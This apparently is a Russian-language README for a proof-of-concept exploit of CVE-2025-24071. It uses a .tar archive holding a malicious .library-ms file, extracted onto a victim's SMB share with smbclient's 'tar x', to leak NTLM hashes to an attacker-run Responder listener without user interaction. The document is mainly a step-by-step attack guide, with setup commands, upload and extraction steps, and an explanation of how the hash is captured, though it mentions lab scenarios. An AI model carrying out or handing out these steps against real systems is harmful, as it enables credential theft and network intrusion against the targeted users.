
Эксплуатация CVE-2025-24071 через SMB путем размещения файла .library-ms внутри архива .tar. Используя команду tar x из smbclient, нагрузка извлекается на стороне сервера без взаимодействия с пользователем. Responder перехватывает NTLM-хеш, как только цель обращается к библиотеке.
Это PoC для эксплуатации CVE-2025-24071, уязвимости в Windows, которая позволяет утечку NTLM-хэша через файлы .library-ms. Эта версия немного отличается от других тем, что использует архив .tar вместо .zip, что улучшает совместимость в средах, где доступен только SMB.
.tar, а не .zip?Большинство публичных PoC используют .zip для упаковки вредоносного файла .library-ms. Однако, если вы работаете в ограниченной SMB-среде (например, доступ только через smbclient), ZIP-файлы невозможно извлечь удалённо. Используя архив .tar, вы можете распаковать полезную нагрузку напрямую из SMB-шары с помощью команды tar, встроенной в smbclient, что позволяет удалённо развернуть атаку без необходимости взаимодействия с пользователем.
ResponderResponder, impacket-smbserver или samba)Запустите Responder на правильном интерфейсе:
sudo responder -I <interface>
Убедитесь, что IP в полезной нагрузке соответствует этому интерфейсу.
python3 create_tar_poc.py
Вас попросят ввести:
Будут созданы:
С машины атакующего подключитесь к SMB-шаре жертвы с помощью smbclient:
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
Это распакует .library-ms в общую папку.
Когда exploit.tar будет извлечён, файл .library-ms, содержащий вредоносный XML, подключится к нашему SMB (активному Responder на нашей машине), тем самым запустив попытку аутентификации через NTLM путём отправки запроса, содержащего имя пользователя, домен и NTLM-хэш пароля пользователя, который мы впоследствии сможем расшифровать.
Скоро...
Даниэль Миранда Барселона, также известный как Excal1bur | Основано на оригинальной работе 0x6rss, адаптировано для развёртывания через TAR по SMB в лабораторных сценариях.